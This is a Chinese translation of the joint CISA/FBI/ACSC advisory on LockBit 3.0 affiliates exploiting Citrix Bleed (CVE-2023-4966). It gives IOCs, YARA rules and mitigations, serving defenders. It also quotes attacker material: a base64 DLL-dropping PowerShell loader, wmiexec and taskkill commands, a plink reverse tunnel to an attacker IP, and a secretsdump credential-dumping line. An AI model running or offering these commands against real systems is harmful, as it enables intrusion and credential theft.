摘要
注:这份联合网络安全咨询(CSA)是持续进行的#阻止勒索软件(#StopRansomware)活动的一部分,该活动发布了供网络防御者参考的各类勒索软件变种和勒索软件威胁行动者的咨询。这些#阻止勒索软件的咨询包括最近和历史上观察到的策略,技巧和程序(TTPs)以及损害指标(IOCs),帮助组织抵御勒索软件。访问stopransomware.gov查看所有#阻止勒索软件的咨询,了解更多其他勒索软件威胁和免费资源。
美国网络安全和基础设施安全局(CISA)、联邦调查局(FBI)、多州信息共享与分析中心(MS-ISAC)和澳大利亚信号局澳大利亚网络安全中心(ASD的ACSC)正在发布这份联合网络安全咨询(CSA),以传播与LockBit 3.0勒索软件利用CVE-2023-4966(被标记为Citrix Bleed,影响Citrix NetScaler网络应用程序交付控制器(ADC)和NetScaler网关设备)的相关IOCs,TTPs和检测方法。
这份CSA提供了由FBI、ACSC和Boeing自愿分享的TTPs和IOCs。Boeing观察到,LockBit 3.0的附属机构正在利用CVE-2023-4966,获取对Boeing Distribution Inc.的初始访问权限,该公司是其零配件和分销业务,其维护着一个独立的环境。其他可信赖的第三方观察到他们的机构也受到类似活动的影响。
在历史上,LockBit 3.0的附属机构对教育、能源、金融服务、食品和农业、政府和紧急服务、医疗保健、制造和交通等多个关键基础设施领域的各种规模的组织进行了攻击。观察到的LockBit勒索软件攻击的TTPs可能会在观察到的TTPs中有显著变化。
众所周知,被LockBit 3.0的附属机构利用的Citrix Bleed,允许威胁行为者绕过密码要求和多因素认证(MFA),从而成功地劫持了在Citrix NetScaler网络应用程序交付控制(ADC)和网关设备上的合法用户会话。通过接管合法用户的会话,恶意行为者获得了提升权限,收集凭证,进行横向移动,并访问数据和资源。
CISA和编制机构强烈建议网络管理员应用本CSA中发现的缓解措施,包括隔离NetScaler ADC和网关设备,以及通过Citrix知识中心应用必要的软件更新。
编制机构鼓励网络防御者使用本CSA中的检测方法和IOCs在其网络上搜索恶意活动。如果检测到可能的妥协,应应用事故响应建议。如果没有检测到妥协,组织应立即应用公开可用的补丁。
关于相关的恶意软件分析报告(MAR),请参见:MAR-10478915-1.v1 Citrix Bleed
下载本报告的PDF版本:https://www.cisa.gov/sites/default/files/2023-11/aa23-325a_lockbit_3.0_ransomware_affiliates_exploit_cve-2023-4966_citrix_bleed_vulnerability.pdf
要下载IOCs的副本,请参见:
https://www.cisa.gov/sites/default/files/2023-11/AA23-325A.stix_.xml
https://www.cisa.gov/sites/default/files/2023-11/AA23-325A%20Citrix%20Bleed%20Lockbit%20Ransomware%20Exploit%20CVE%202023-4966.stix_.json
技术细节
注意:这份咨询使用了MITRE ATT&CK®企业框架,版本14。请查看MITRE ATT&CK战术和技术部分,了解威胁行动者活动与MITRE ATT&CK战术和技术的映射表。关于如何将恶意网络活动映射到MITRE ATT&CK框架的帮助,请参见CISA和MITRE ATT&CK的MITRE ATT&CK映射的最佳实践和CISA的决策工具。
CVE-2023-4966
CVE-2023-4966是一种在NetScaler Gateway产品中发现的软件漏洞,最早在2023年8月就发现了其被滥用的情况。这种漏洞为威胁行动者(包括LockBit 3.0勒索软件附属机构)提供了能够绕过多因素认证MFA [T1556.006],并劫持合法用户会话 [T1563]的能力。
在获取有效的Cookie后,LockBit 3.0附属机构在NetScaler设备中建立了一个认证会话,而无需用户名、密码或MFA令牌的访问权限[T1539]。附属机构通过发送一个包含特制HTTP主机标头的HTTP GET请求来获取这个,这导致易受攻击的设备返回系统存储器信息[T1082]。通过这种攻击获取的信息包含一个有效的NetScaler AAA会话Cookie。
Citrix在2023年10月10日在其Citrix安全公告中公开披露了CVE-2023-4966,发布了指导信息,并详细描述了受影响的产品、IOCs以及建议。基于广泛可用的公开攻击手法和积极利用的证据,CISA将此漏洞添加到已知被利用漏洞 (KEVs) 目录中。这个关键的漏洞影响了以下软件版本[1]:
由于这种漏洞易于被利用,CISA和编写报告的组织预计在未修补的私有和公共网络的软件服务中,对Citrix漏洞的广泛利用将会增多。
威胁行动分析
在此活动中识别的恶意软件是从执行PowerShell脚本(123.ps1)开始生成的,它将两个base64字符串连接在一起,将它们转换为字节,然后将它们写入指定的文件路径。
$y = “TVqQAAMA…<long base64 string>”
$x = “RyEHABFQ…<long base64 string>”
$filePath = “C:UsersPublicadobelib.dll”
$fileBytes = [System.Convert]::FromBase64String($y + $x)
[System.IO.File]::WriteAllBytes($filePath, $fileBytes)
产生的文件(adobelib.dll)随后通过PowerShell脚本使用rundll32执行
rundll32 C:UsersPublicadobelib.dll,main <104十六进制字符键>
如果没有104十六进制字符键,动态链接库(DLL)将无法正确执行。执行后DLL尝试向https://adobe-usupdatefiles[.]digital/index.php发送POST请求,此网址截至2023年11月16日解析到IP地址172.67.129[.]176和104.21.1[.]180。虽然adobelib.dll和adobe-us-updatefiles[.]digital有合法性的外观,但文件和域名与合法的Adobe软件没有任何关联,也没有发现与该软件的交互。
观察到的其他活动包括使用与勒索软件活动常关联的各种TTPs。例如,已经观察到LockBit 3.0附属机构使用AnyDesk和Splashtop远程管理和监视(RMM),批处理和PowerShell脚本,使用Windows原生工具mshta.exe执行HTA文件,以及其他与勒索软件事件通常关联的常见软件工具。
威胁指标(IoCs)
请参见表1至表5,了解与Lockbit 3.0附属机构利用CVE-2023-4966漏洞相关的威胁指标。
[可靠性]图例:
低置信度指标可能与勒索软件无关。
|
指标 |
类型 |
可信度 |
描述 |
|
192.229.221[.]9 5 |
IP |
低 |
Mag.dll调用此IP地址。追溯到dns0.org。如果可能,应在沙箱中运行此DLL来确认C2。IP是共享托管。 |
|
123.ps1 |
PowerShell脚本 |
高 |
通过脚本创建和执行有效负载。 |
|
193.201.9[.]224 |
IP |
高 |
从受感染系统通过FTP连接到俄罗斯地区定位的IP。 |
|
62.233.50[.]25 |
IP |
高 |
从受感染系统的俄罗斯地区定位的IP。 Hxxp://62.233.50 [.]25/en-us/docs.html Hxxp://62.233.50[.]25/en-us/test.html |
|
Hxxp://62.233.50[.]25/en-us/docs.html |
URL |
– |
– |
|
Hxxp://62.233.50[.]25/en-us/test.html |
URL |
– |
– |
|
51.91.79[.].17 |
IP |
中 |
Temp.sh IP地址。 |
|
Teamviewer |
工具(远程 管理) |
低 |
– |
|
70.37.82[.]20 |
IP |
低 |
已知受感染账户访问Altera IP地址的IP被发现。LockBit被已知利用Altera,一个远程管理工具,如Anydesk、team viewer等。 |
|
185.17.40[.]178 |
IP |
低 |
Teamviewer C2,追溯至波兰服务提供商Artnet Sp. Zo.o波兰IP地址。 |
表1:LockBit 3.0附属机构Citrix泄露活动
|
指标 |
类型 |
可信度 |
描述 |
|
185.229.191.41 |
Anydesk使用 |
高 |
Anydesk 命令控制服务器。 |
|
81.19.135[.]219 |
IP地址 |
高 |
俄罗斯地理定位IP,hxxp://81.19.135[.]219/F8PtZ87fE8dJWqe.hta 和 hxxp://81.19.135[.]219:443/q0X5wzEh6P7.hta |
|
45.129.137[.]233 |
IP地址 |
中 |
在遭受威胁的时间窗口开始时,已知受损设备发出的呼叫。 |
|
185.229.191[.]41 |
Anydesk使用 |
高 |
Anydesk 命令控制服务器。 |
|
Plink.exe |
命令解释器 |
高
|
Plink(PuTTY Link)是一个命令行连接工具,类似于UNIX SSH。它主要用于自动化操作,如使CVS能够远程访问服务器上的仓库。Plink可以用来自动化SSH操作以及在Windows上进行远程SSH隧道。 |
|
AnyDeskMSI.exe |
远程管理工具 |
高 |
我们确实看到AnyDeskMSI.exe已安装为带有“自动启动”功能的服务以保持持续运行。可以从图像中的配置文件找到ID和连接IP,但我们目前没有这些信息。 |
|
SRUtility.exe |
Splashtop工具 |
高 |
9b6b722ba4a691a2fe21747cd5b8a2d18811a173413d4934949047e04e40b30a |
|
Netscan exe
|
网络扫描软件 |
高 |
498ba0afa5d3b390f852af66bd6e763945bf9b6bff2087015ed8612a18372155 |
表2:LockBit 3.0合作伙伴Citrix Bleed活动
|
指标 |
类型 |
可信度 |
描述 |
|
Scheduled task: MEGAMEGAcmd |
持久性 |
高 |
|
|
Scheduled task: UpdateAdobeTask |
持久性 |
高 |
|
|
Mag.dll |
持久性 |
高 |
在UpdateAdobeTask中确认正在运行 cc21c77e1ee7e916c9c48194fad083b2d4b2023df703e544ffb2d6a0bfc90a63。 |
|
123.ps1 |
脚本 |
高 |
创建 rundll32 C:UsersPublicadobelib.dll,main ed5d694d561c97b4d70efe934936286fe562addf7d6836f795b336d9791a5c44。 |
|
Adobelib.dll |
持久性 |
低 |
来自adobelib.dll的C2。 |
|
Adobe-usupdatefiles[.]digital |
工具下载 |
高 |
用于下载混淆了的工具集。 |
|
172.67.129[.]176 |
工具下载 |
高 |
adobe-us-updatefiles[.]digital的IP地址 |
|
104.21.1[.]180 |
工具下载 |
高 |
Adobe-us-updatefiles[.]digital。 |
|
cmd.exe /q /c cd 1> \127.0.0.1admi n$__169861779 3[.]44 2>&1 |
命令 |
高 |
wmiexec.exe使用情况 |
|
cmd.exe /q /c cd 1> \127.0.0.1admi n$__169861779 3[.]44 2>&1 |
命令 |
高 |
wmiexec.exe使用情况 |
|
cmd.exe /q /c query user 1> \127.0.0.1admi n$__169861779 3[.]44 2>&1 |
命令 |
高 |
wmiexec.exe使用情况 |
|
cmd.exe /q /c taskkill /f /im sqlwriter.exe /im winmysqladmin. exe /im w3sqlmgr.exe /im sqlwb.exe /im sqltob.exe /im sqlservr.exe /im sqlserver.exe /im sqlscan.exe /im sqlbrowser.exe /im sqlrep.exe /im sqlmangr.exe /im sqlexp3.exe /im sqlexp2.exe /im sqlex |
命令 |
高 |
wmiexec.exe使用情况 |
|
cmd.exe /q /c cd 1> \127.0.0.1admi n$__169861813 3[.]54 2>&1 |
命令 |
高 |
wmiexec.exe使用情况 |
表3:LockBit 3.0联盟Citrix Bleed活动
编写机构建议监控/审查流向81.19.135[.]* C类网络的数据流,并检查是否有通过HTTP参数调用MSHTA的情况[2]。
|
指标 |
类型 |
可信度 |
描述 |
备注 |
|
81.19.135[.]219 |
IP |
高 |
用户使用的位于俄罗斯的IP,通过HTTP参数请求mshta下载命名为q0X5wzzEh6P7.hta的随机命名HTA文件 |
|
|
81.19.135[.]220 |
IP |
高 |
俄罗斯地理定位IP,在日志中看到出站 |
IP已注册到南非的 公司 |
|
81.19.135[.]226 |
IP |
高 |
俄罗斯地理定位IP,在日志中看到出站 |
IP已注册到南非的公司 |
表4:LockBit 3.0联盟Citrix Bleed活动
|
类型 |
指标 |
描述 |
|
文件名 |
c:users<username>downloadsprocess hacker 2peview.exe |
Process hacker |
|
文件名 |
c:users<username>musicprocess hacker 2processhacker.exe |
Process hacker |
|
文件名 |
psexesvc.exe |
Psexec 服务执行文件 |
|
文件名 |
c:perflogsprocesshacker.exe |
Process hacker |
|
文件名 |
c:windowstempscreenconnect23.8.5.8707filesprocesshacker.exe |
通过screenconnect传输的Process hacker |
|
文件名 |
c:perflogslsass.dmp |
Lsass转储文件 |
|
文件名 |
c:users<username>downloadsmimikatz.exe |
Mimikatz工具 |
|
文件名 |
c:users<username>desktopproc64proc.exe |
Procdump工具 |
|
文件名 |
c:users<username>documentsveeam-get-creds.ps1 |
解密Veeam凭据 |
|
文件名 |
secretsdump.py |
在Azure虚拟机上安装的Impacket |
|
命令行 |
secretsdump.py <domain>/<username>@<ip> -outputfile 1 |
在Azure虚拟机上安装的Impacket |
|
文件名 |
ad.ps1 |
在Powershell记录中发现的Adrecon |
|
文件名 |
c:perflogs64-bitnetscan.exe |
Softperfect 网络扫描 |
|
文件名 |
tniwinagent.exe |
Total network inventory代理 |
|
文件名 |
psexec.exe |
用于部署screenconnect的Psexec |
|
文件名 |
7z.exe |
用于压缩文件的工具 |
|
工具 |
Action1 |
RMM远程监控管理 |
|
工具 |
Atera |
RMM远程监控管理 |
|
工具 |
anydesk |
RMM远程监控管理 |
|
工具 |
fixme it |
RMM远程监控管理 |
|
工具 |
screenconnect |
RMM远程监控管理 |
|
工具 |
splashtop |
RMM远程监控管理 |
|
工具 |
zoho assist |
RMM远程监控管理 |
|
IPv4 |
101.97.36[.]61 |
Zoho Assist |
|
IPv4 |
168.100.9[.]137 |
SSH端口转发基础设施 |
|
IPv4 |
185.20.209[.]127 |
Zoho Assist |
|
IPv4 |
185.230.212[.]83 |
Zoho Assist |
|
IPv4 |
206.188.197[.]22 |
Powershell日志中看到的反向Shell |
|
IPv4 |
54.84.248[.]205 |
Fixme IP |
|
IPv4 |
141.98.9[.]137 |
CitrixBleed的远程IP |
|
域名 |
assist.zoho.eu |
Zoho Assist |
|
文件名 |
c:perflogs1.exe |
ConnectWise更名 |
|
文件名 |
c:perflogsrun.exe |
通过Psexec推送的screenconnect |
|
文件名 |
c:perflogs64-bitm.exe |
ConnectWise更名 |
|
文件名 |
c:perflogs64-bitm0.exe |
ConnectWise更名 |
|
文件名 |
c:perflogsza_access_my_department.exe |
Zoho远程协助 |
|
文件名 |
c:users<username>musicza_access_my_department.exe |
Zoho远程协助 |
|
文件名 |
c:windowsservicehost.exe |
更名为plink的程序 |
|
文件名 |
c:windowssysconf.bat |
执行servicehost.exe (plink) 命令的脚本 |
|
文件名 |
c:windowstempscreenconnect23.8.5.8707filesazure.msi |
用于通过screenconnect传输数据的Zoho远程协助 |
|
命令行 |
echo enter | c:windowsservicehost.exe -ssh -r 8085:127.0.0.1:8085 <username>@168.100.9[.]137 -pw <password> |
plink端口转发 |
|
域名 |
eu1-dms.zoho[.]eu |
Zoho Assist |
|
域名 |
fixme[.]it |
Fixme IT |
|
域名 |
unattended.techinline[.]net |
Fixme IT |
表5:Citrix Bleed威胁指标(IOC)
MITRE ATT&CK策略和技术
请查看本公告中所有引用的威胁行为者战术和技术的表6和表7。
|
技术标题 |
ID |
使用 |
|
系统信息发现 |
T1082 |
威胁行为者将尝试获取有关操作系统和硬件的信息,包括版本和修补程序。 |
表6:针对企业的ATT&CK技术:发现
|
技术标题 |
ID |
使用 |
|
修改身份验证过程:多因素因素身份验证 |
T1556.006 |
威胁行为者利用CVE发现的漏洞来攻击、修改和/或绕过多因素身份验证,以劫持用户会话、获取凭据和横向移动,从而实现持久访问。 |
|
窃取Web会话Cookie |
T1539 |
能够访问有效cookie的威胁行为者可以在 NetScaler设备中建立一个经过身份验证的会话,无需使用用户名、密码或访问多因素身份验证 (MFA)令牌。 |
表7:针对企业的ATT&CK技术:凭证访问
检测方法
狩猎指南
网络防御者在搜寻网络异常时应当优先监控用户的会话动态。这有助于寻找可疑活动,比如在系统上安装工具(如putty、rClone)、创建新账户、日志项失败,或执行 hostname、quser、whoami、net 和 taskkill 等命令。定期更新通过有漏洞的NetScaler ADC或Gateway设备访问资源的身份验证凭据也有助于检测。
对于IP地址:
-
确认NetScaler是否记录了IP变更。
-
确认用户登录位置是否为组织用户基础的不常见地理位置。
-
如果记录了VPN认证,确认在不同子网或地理位置分散的情况下,用户是否关联有两个或多个公共IP地址。
注意:由于攻击者通过提供一个已认证用户的token/session来绕过验证,NetScaler的多因素认证(MFA)将无法如预期那样工作。
以下程序有助于识别可能的CVE-2023-4966和LockBit 3.0活动的利用:
■ 搜索包含tf0gYx2YI的文件名,以识别LockBit加密文件。
■ 观察到LockBit 3.0的行动者在C:Temp 目录中加载和执行文件。
■ 调查来自WAF的HTTP/S端点的请求。
■ 从NetScaler日志中追踪可疑登录模式。
■ 搜索可疑的虚拟桌面代理Windows注册表键值。
■ 分析内存核心转储文件。
下方是CISA开发的YARA规则和一个开源规则,可用于检测Citrix NetScaler ADC和Gateway软件环境中的恶意活动。更多关于在NetScaler日志中检测可疑活动的信息或额外资源,访问CISA的恶意软件分析报告(MAR)MAR-10478915-1.v1 Citrix Bleed或这个CSA [3]的资源部分。
YARA规则
CISA 收到了四个文件用于分析,这些文件用于保存注册表文件、将本地安全颁发子系统服务(LSASS)进程的内存转储到磁盘上,以及尝试通过 Windows 远程管理(WinRM)建立会话。这些文件包括:
■ Windows 批处理文件(.bat)
■ Windows 可执行文件(.exe)
■ Windows 动态链接库(.dll)
■ Python 脚本(.py):
rule CISA_10478915_01 : trojan installs_other_components
{
meta:
author = “CISA Code & Media Analysis”
incident = “10478915”
date = “2023-11-06”
last_modified = “20231108_1500”
actor = “n/a”
family = “n/a”
capabilities = “installs-other-components”
malware_Type = “trojan”
tool_type = “information-gathering”
description = “Detects trojan .bat samples”
sha256 = “98e79f95cf8de8ace88bf223421db5dce303b112152d66ffdf27ebdfcdf967e9”
strings:
$s1 = { 63 3a 5c 77 69 6e 64 6f 77 73 5c 74 61 73 6b 73 5c 7a 2e 74 78 74 }
$s2 = { 72 65 67 20 73 61 76 65 20 68 6b 6c 6d 5c 73 79 73 74 65 6d 20 63 3a 5c 77 69 6e 64 6f 77 73 5c 74 61 73 6b 73
5c 65 6d }
$s3 = { 6d 61 6b 65 63 61 62 20 63 3a 5c 75 73 65 72 73 5c 70 75 62 6c 69 63 5c 61 2e 70 6e 67 20 63 3a 5c 77 69 6e 64
6f 77 73 5c 74 61 73 6b 73 5c 61 2e 63 61 62 }
condition:
all of them
}
这个文件是一个名为a.bat的Windows批处理文件,它用来执行名为a.exe的文件,并将名为a.dll的文件作为参数。输出打印到位于C:WindowsTasks路径下名为’z.txt’的文件中。接下来,a.bat三次ping本地环回的互联网协议(IP)地址127.0.0[.]1。
它运行的下一个命令是reg save,用于将HKLMSYSTEM注册表配置单元保存到C:Windowstasksem目录中。再次,a.bat在执行另一个reg save命令并将HKLMSAM注册表配置单元保存到C:WindowsTaskam目录之前,ping本地环回地址127.0.0[.]1一次。接下来,a.bat运行三个makecab命令,从前面提到的已保存的注册表配置单元和一个名为C:UsersPublica.png的文件中创建三个存储柜(.cab)文件。这些.cab文件的名称分别是:
nc:windowstasksem.cab
nc:windowstasksam.cab
nc:windowstasksa.cab
rule CISA_10478915_02 : trojan installs_other_components
{
meta:
author = “CISA Code & Media Analysis”
incident = “10478915”
date = “2023-11-06”
last_modified = “20231108_1500”
actor = “n/a”
family = “n/a”
capabilities = “installs-other-components”
malware_type = “trojan”
tool_type = “unknown”
description = “Detects trojan PE32 samples”
sha256 = “e557e1440e394537cca71ed3d61372106c3c70eb6ef9f07521768f23a0974068”
strings:
$s1 = { 57 72 69 74 65 46 69 6c 65 }
$s2 = { 41 70 70 50 6f 6c 69 63 79 47 65 74 50 72 6f 63 65 73 73 54 65 72 6d 69 6e 61 74 69 6f 6e 4d 65 74 68 6f 64 }
$s3 = { 6f 70 65 72 61 74 6f 72 20 63 6f 5f 61 77 61 69 74 }
$s4 = { 43 6f 6d 70 6c 65 74 65 20 4f 62 6a 65 63 74 20 4c 6f 63 61 74 6f 72 }
$s5 = { 64 65 6c 65 74 65 5b 5d }
$s6 = { 4e 41 4e 28 49 4e 44 29 }
condition:
uint16(0) == 0x5a4d and pe.imphash() == “6e8ca501c45a9b85fff2378cffaa24b2” and pe.size_of_code == 84480 and all of
them
}
这个文件是一个名为a.exe的64位Windows命令行可执行文件,由a.bat执行。该文件向远程过程调用(RPC)端点发出ncalrpc:[lsasspirpc]调用,以向受感染机器上的LSASS提供一个文件路径。一旦文件路径返回,恶意软件就会将陪同的名为a.dll的DLL文件加载到正在运行的LSASS进程中。如果DLL正确加载,那么恶意软件将在控制台输出消息“[*]success”。
rule CISA_10478915_03 : trojan steals_authentication_credentials credential_exploitation
{
meta:
author = “CISA Code & Media Analysis”
incident = “10478915”
date = “2023-11-06”
last_modified = “20231108_1500”
actor = “n/a”
family = “n/a”
capabilities = “steals-authentication-credentials”
malware_type = “trojan”
tool_type = “credential-exploitation”
description = “Detects trojan DLL samples”
sha256 = “17a27b1759f10d1f6f1f51a11c0efea550e2075c2c394259af4d3f855bbcc994”
strings:
$s1 = { 64 65 6c 65 74 65 }
$s2 = { 3c 2f 74 72 75 73 74 49 6e 66 6f 3e }
$s3 = { 42 61 73 65 20 43 6c 61 73 73 20 44 65 73 63 72 69 70 74 6f 72 20 61 74 20 28 }
$s4 = { 49 6e 69 74 69 61 6c 69 7a 65 43 72 69 74 69 63 61 6c 53 65 63 74 69 6f 6e 45 78 }
$s5 = { 46 69 6e 64 46 69 72 73 74 46 69 6c 65 45 78 57 }
$s6 = { 47 65 74 54 69 63 6b 43 6f 75 6e 74 }
condition:
uint16(0) == 0x5a4d and pe.subsystem == pe.SUBSYSTEM_WINDOWS_CUI and pe.size_of_code == 56832 and all of
them
}
这个文件是一个名为a.dll的64位Windows DLL,由a.bat执行作为文件a.exe的参数。文件a.exe将这个文件加载到受感染机器上正在运行的LSASS进程中。文件a.dll调用Windows API CreateFileW,在路径C:UsersPublic下创建一个名为a.png的文件。
接下来,a.dll加载DbgCore.dll,然后利用MiniDumpWriteDump函数将LSASS进程内存转储到磁盘上。如果成功,转储的进程内存将被写入a.png文件。一旦这一过程完成,文件a.bat指定使用文件a.png在路径C:WindowsTasks下创建一个名为a.cab的存储柜文件。
C:WindowsTasks
rule CISA_10478915_04 : backdoor communicates_with_c2 remote_access
{
meta:
author = “CISA Code & Media Analysis”
incident = “10478915”
date = “2023-11-06”
last_modified = “20231108_1500”
actor = “n/a”
family = “n/a”
capabilities = “communicates-with-c2”
malware_type = “backdoor”
tool_type = “remote-access”
description = “Detects trojan python samples”
sha256 = “906602ea3c887af67bcb4531bbbb459d7c24a2efcb866bcb1e3b028a51f12ae6”
strings:
$s1 = { 70 6f 72 74 20 3d 20 34 34 33 20 69 66 20 22 68 74 74 70 73 22 }
$s2 = { 6b 77 61 72 67 73 2e 67 65 74 28 22 68 61 73 68 70 61 73 73 77 64 22 29 3a }
$s3 = { 77 69 6e 72 6d 2e 53 65 73 73 69 6f 6e 20 62 61 73 69 63 20 65 72 72 6f 72 }
$s4 = { 57 69 6e 64 77 6f 73 63 6d 64 2e 72 75 6e 5f 63 6d 64 28 73 74 72 28 63 6d 64 29 29 }
condition:
all of them
}
这个文件是一个名为a.py的Python脚本,它尝试利用WinRM(Windows远程管理)建立会话。如果存在关键词”hashpasswd”,脚本会尝试使用NT LAN Manager(NTLM)对远程机器进行认证。如果关键词”hashpasswd”不存在,那么脚本会尝试使用基本认证进行认证。一旦与远程机器建立了WinRM会话,脚本就有能力在远程机器上执行命令行参数。如果没有指定命令,那么就会运行默认命令“whoami”。
开源YARA规则
Import “pe”
rule M_Hunting_Backdoor_FREEFIRE
{
meta:
author = “Mandiant”
description = “This is a hunting rule to detect FREEFIRE samples using OP code sequences in getLastRecord method”
md5 = “eb842a9509dece779d138d2e6b0f6949”
malware_family = “FREEFIRE”
strings:
$s1 = { 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 74 ?? ?? ?? ?? 25 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 74 ?? ?? ?? ?? 25 6F ?? ?? ?? ?? 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? ?? 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? ?? 6F ?? ?? ?? ?? ??
}
condition:
uint16(0) == 0x5A4D
and filesize >= 5KB
and pe.imports(“mscoree.dll”)
and all of them
}
事件响应
组织被鼓励评估Citrix软件和你的系统是否有被入侵的迹象,并寻找恶意活动(参见附加资源部分)。如果怀疑或检测到入侵,组织应假设威胁行为者拥有完全的管理员访问权限,可以执行与web管理软件相关的所有任务,以及安装恶意代码。
如果检测到潜在的入侵,组织应:
1.隔离或将可能受影响的主机脱机。
2.重新制作受到入侵的主机。
3.创建新账户凭证。
4.收集和审查运行中的进程/服务,异常认证以及最近的网络连接等如工件。
注意:删除恶意管理员账户可能无法完全减轻风险,因为威胁行为者可能已建立了额外的持久性机制。
5. 将入侵事件报告给FBI网络犯罪投诉中心(IC3) IC3.gov,FBI当地办公室,或CISA(美国网络安全基础设施局)通过该机构的事件报告系统或其全天候运行中心([email protected]或888-282-0870)。州,地方,部落,或领土政府(SLTT)实体也可以报告给MS-ISAC([email protected]或866-787-4722). 如果在美国境外,请联系您的国家网络中心。
缓解措施
这些缓解措施适用于所有使用Citrix NetScaler ADC和Gateway软件的关键基础设施组织和网络防御者。CISA和授权组织建议软件制造商将安全优先和默认的原则和策略纳入其软件开发实践,以限制利用的影响,例如威胁行为者利用Citrix NetScaler设备未打补丁的漏洞,这增强了他们客户的安全态势。
有关安全设计的更多信息,请参见CISA的安全设计和默认网页和联合指南。
这份CSA的作者组织建议组织实施以下缓解措施,以改善您的网络安全态势的基础上的威胁行为者活动,并降低与Citrix CVE 2023-4966和LockBit 3.0勒索软件&勒索软件附属相关的风险。这些缓解措施符合由CISA和国家标准和技术研究所(NIST)制定的跨行业网络安全性能目标(CPGs)。CPGs提供了一套最低的实践和保护,CISA和NIST建议所有组织实施。CISA和NIST基于现有的网络安全框架和指南制定了CPGs,以防护最常见和影响最大的威胁、战术、技巧和程序。访问CISA的跨行业网络安全业绩目标,了解关于CPGs的更多信息,包括其他推荐的基础保护。
– 对NetScaler ADC和Gateway设备进行隔离测试,直到补丁准备就绪并可部署。
– 通过以下措施保护远程访问工具:
l 实施应用程序控制,以管理和控制软件的执行,包括允许远程访问程序的列表。应用程序控制应阻止安装和执行未授权的远程访问和其他软件的便携式版本。正确配置的应用程序允许列表解决方案将阻止任何未列出的应用程序执行。允许列表是重要的,因为杀毒解决方案可能不能检测到恶意便携式可执行文件的执行,当文件使用任何压缩、加密或混淆的组合时。
l 严格限制使用RDP以及其他远程桌面服务。如果需要使用RDP,则应严格应用最佳实践,例如 [CPG 2.W]:
– 审计使用RDP的网络系统。
– 关闭未使用的RDP端口。
– 在一定次数尝试后强制账户锁定。
– 应用防钓鱼的多因素认证(MFA)。
– 记录远程桌面协议登录尝试。
l 使用组策略限制PowerShell的使用,并仅针对特定用户授予访问权限。通常情况下,只有管理网络或Windows操作系统(OSs)的用户或管理员才能使用PowerShell [CPG 2.E]。
l 更新Windows PowerShell或PowerShell Core至最新版本,并卸载所有早期版本的PowerShell。5.0之前版本的Windows PowerShell的日志几乎不存在,或者不记录足够的详细信息以帮助企业监视和事故响应活动 [CPG 1.E, 2.S, 2.T]。
l 启用增强的PowerShell日志记录[CPG 2.T, 2.U]。
¡– PowerShell日志包含有价值的数据,这其中包括操作系统和注册表交互的历史数据以及威胁行为者使用PowerShell的可能行为的数据。
¡– 确保使用最新版本的PowerShell实例,启用了模块、脚本块和转录日志(增强日志记录)。
¡– 记录PowerShell活动的两个日志文件是PowerShell Windows事件日志和PowerShell操作日志。FBI和CISA建议打开这两个Windows事件日志,保留期至少180天。这些日志应定期检查,以确认日志数据是否已被删除,或者日志记录是否已被关闭。为两个日志设置的存储规格应该尽可能大。
l配置Windows注册表,对任何需要管理员权限的PsExec操作都需要用户帐号控制(UAC)的批准,以降低PsExec横向移动的风险。
l实施恢复计划,以在物理上独立、分割和安全的位置(例如,硬盘驱动器、存储设备或云)上,保存和存留多份敏感或私有数据和服务器的多份副本。
l要求所有具有密码登录的账户(例如,服务账户、管理员账户和域管理员账户)遵守NIST制定和管理密码策略的标准。
– 使用长密码,至少15个字符 [CPG 2.B]。
– 使用业界公认的密码管理器,以哈希格式存储密码。
– 在共享登录凭据中添加用户“混淆”。
– 避免重复使用密码 [CPG 2.C]。
– 实施多次登录失败后的账户锁定 [CPG 2.G]。
– 禁用密码“提示”。
– 需要管理员凭证来安装软件。
l保持所有操作系统、软件和固件的最新状态。及时打补丁是组织最有效、成本效益最高的步骤之一,可以最大限度地减小其暴露于网络安全威胁的风险。组织应在漏洞披露后的24至48小时内打补丁修复易受攻击的软件和硬件系统。优先对互联网面向的已知被利用漏洞进行打补丁 [CPG 1.E]。
将有漏洞的NetScaler ADC和Gateway设备升级到最新版本,以降低被利用的风险。
验证安全控制
除了应用缓解措施外,美国网络安全与基础设施安全局(CISA)建议对照本通告中映射到MITRE ATT&CK企业框架的威胁行为,对您的组织的安全程序进行练习、测试和验证。CISA建议测试您现有的安全控制库存,以评估它们对本通告中描述的ATT&CK技术的表现。
开始的步骤:
1. 选择本通告中描述的一个ATT&CK技术(参见表1)。
2. 将您的安全技术与该技术对齐。
3. 测试您的技术对抗该技术。
4. 分析您的检测和预防技术的性能。
5. 对所有安全技术重复此过程,以获得一套全面的性能数据。
6. 根据此过程生成的数据调整您的安全程序,包括人员、流程和技术。
CISA和编写组织建议持续测试您的安全程序,在生产环境中大规模进行,以确保对本通告中识别的MITRE ATT&CK技术的最佳性能。
原文始发于微信公众号(微步在线研究响应中心):LockBit 近期勒索大企业们的全部细节!被波音公开!
